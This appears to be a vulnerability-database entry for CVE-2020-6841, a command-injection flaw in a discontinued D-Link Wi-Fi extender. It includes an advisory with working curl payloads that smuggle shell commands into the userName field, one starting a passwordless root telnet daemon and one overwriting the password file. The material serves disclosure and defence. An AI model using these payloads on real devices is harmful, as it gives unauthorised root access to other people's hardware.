Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
attackerkbAttackerKBAKB:337E2206-259F-4FA9-82D8-9DCDF70019FC
HistoryFeb 21, 2020 - 12:00 a.m.

CVE-2020-6841

2020-02-2100:00:00
attackerkb.com
35

EPSS

0.024

Percentile

90.1%

JSON

D-Link DCH-M225 1.05b01 and earlier devices allow remote attackers to execute arbitrary OS commands via shell metacharacters in the spotifyConnect.php userName parameter.

Recent assessments:

kevthehermit at February 22, 2020 10:59pm UTC reported:

This analysis is a transcript of a public gist – Original Source – <https://gist.github.com/jezzaaa/38c752d0a129576b2cc523ce6325050f&gt;

D-Link DCH-M225 1.04 devices allow remote attackers to execute
arbitrary OS commands via shell metacharacters in the
spotifyConnect.php userName parameter.

[Additional Information]
From the local network (eg wifi), access the URL
<http://ip-address/spotifyConnect.php&gt; with POST variables:

action=addUser userName=;/usr/sbin/telnetd -i br0 >/dev/null &;

For example, from a Linux command-line:

curl -d ‘action=addUser&userName=;/usr/sbin/telnetd -i br0 >/dev/null &;’ <http://192.168.0.50/spotifyConnect.php&gt;

This starts a telnet daemon that provides a root shell with no
password.Then telnet to the device for a root shell.

The same exploit can be used to temporarily change the root password,
using something like:

curl -d ‘action=addUser&userName=;echo “\“Admin\” \“\” \“0\”“>/var/passwd.new;’ <http://192.168.1.204/spotifyConnect.php&gt;

This exploit would also work on a network that exposes port 80 on the
device to the Internet, in which case this would allow a remote root
shell to an unprivileged user.

The vendor has stated that the device has been discontinued (as of
April 2018), and that they won’t be patching.

The vulnerable “Spotify Connect” feature of the product may have been
implemented on other devices that are still for sale or still under
support, possibly using the same vulnerable code implemented in
spotifyCode.php on this device. The vendor has been asked if any
of their other products use the same code, but they did not answer
this question.

[VulnerabilityType Other]
command injection (missing input validation, escaping)

[Vendor of Product]
D-Link

[Affected Product Code Base]
DCH-M225 Wi-fi Range Extender – 1.04

[Affected Component]
script spotifyConnect.php

[Attack Type]
Local

[Attack Vectors]
Submit HTTP request to add a Spotify Connect user (no admin auth
required), using a username containing a semicolon followed by an
arbitrary command (which runs as root) such as telnetd or commands to
modify the admin user’s password.

[References]
<https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10152&gt;
<https://www.dlink.com.au/home-solutions/dch-m225-wi-fi-audio-extender&gt;
<https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf&gt;
<https://www.dlink.com/en/security-bulletin&gt;

Assessed Attacker Value: 2
Assessed Attacker Value: 2Assessed Attacker Value: 5

Related

nvd 1
cvelist 1
cve 1
prion 1
nvd
nvd
CVE-2020-6841
2020-02-21 16:15:11
cvelist
cvelist
CVE-2020-6841
2020-02-21 15:35:04
cve
cve
CVE-2020-6841
2020-02-21 16:15:11
prion
prion
Design/Logic Flaw
2020-02-21 16:15:00

EPSS

0.024

Percentile

90.1%

JSON
Related for AKB:337E2206-259F-4FA9-82D8-9DCDF70019FC
nvd1cvelist1cve1prion1